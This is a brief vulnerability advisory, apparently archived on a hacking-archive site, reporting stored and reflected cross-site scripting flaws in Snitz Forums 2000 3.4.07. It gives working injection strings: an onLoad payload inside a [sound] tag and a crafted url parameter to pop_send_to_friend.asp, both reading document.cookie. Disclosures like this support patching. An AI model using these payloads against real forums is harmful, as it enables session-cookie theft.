AOH :: HP Unsorted S :: BT-21830.HTM

Snitz Forums 2000 Multiple Cross-Site Scripting Vulnerabilities



Snitz Forums 2000 Multiple Cross-Site Scripting Vulnerabilities
Snitz Forums 2000 Multiple Cross-Site Scripting Vulnerabilities



**************************************************************
Application: Snitz Forums 2000
Version affected:  3.4.07
Website: http://forum.snitz.com/ 
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi@gmail.com 
Web: http://www.andreafabrizi.it 
Vuln: Multiple Cross-Site Scripting
**************************************************************

###### PERMANENT XSS
If [sound] tag is allowed:

[sound]http://url_to_valid_mp3_or_m3u_file.m3u" 
onLoad="alert(document.cookie)[/sound]
######

###### LINK XSS
http://localhost/forum/pop_send_to_friend.asp?url= 
src="http://www.google.it/intl/it_it/images/logo.gif" onLoad 
="alert(document.cookie)">

Note the space: onLoad="alert(document.cookie)"
######

-- 
Andrea Fabrizi
http://www.andreafabrizi.it 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.